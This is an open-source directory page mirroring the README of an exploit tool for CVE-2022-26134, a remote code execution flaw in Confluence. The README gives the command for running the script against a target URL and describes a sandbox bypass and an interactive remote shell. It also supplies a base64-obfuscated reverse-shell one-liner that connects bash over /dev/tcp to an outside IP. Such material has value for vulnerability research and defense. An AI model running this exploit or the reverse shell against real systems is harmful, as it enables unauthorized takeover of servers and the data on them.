SNCKER CVE 2022 26134 Save

[CVE-2022-26134]Confluence OGNL expression injected RCE with sandbox bypass.

Project README

CVE-2022-26134

Confluence OGNL expression injected RCE(CVE-2022-26134) poc and exp

Update

Add sandbox bypass, high version supported.

Usage

Usage: python Confluence_cve_2022_26134_RCE.py http://example.com/

The script will auto check target is vulnerable, and enter a pseudo-interactive shell if it's vulnerable.

Test under linux：
linux

Test under windows：
windows

Just input 'q' when you want to quit.

Some tips

Command parameters are directly passed to the runtime.exec method, which does not have the context of the shell.
so.
Under Windows, some commands such as dir cannot be executed directly, you can use cmd.exe /c dir.
Under linux, some special symbols cannot take effect, If you need to execute some command with special symbols like reverse shell, you can base64 encode it and then use bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xLjEuMS4xLzg4ODggMD4mmQ==}|{base64,-d}|{bash,-i}.

Open Source Agenda is not affiliated with "SNCKER CVE 2022 26134" Project. README Source: SNCKER/CVE-2022-26134

Stars

Open Issues

Last Commit

1 year ago

Repository

SNCKER/CVE-2022-26134

Open Source Agenda Badge

<a href="https://www.opensourceagenda.com/projects/sncker-cve-2022-26134"><img src="https://www.opensourceagenda.com/projects/sncker-cve-2022-26134/reviews/badge.svg" alt="Open Source Agenda"></a>

Submit Review Review Your Favorite Project

Submit Resource Articles, Courses, Videos

Submit Article Submit a post to our blog

From the blog

Dec 11, 2022

How to Choose Which Programming Language to Learn First?

From the blog

Dec 11, 2022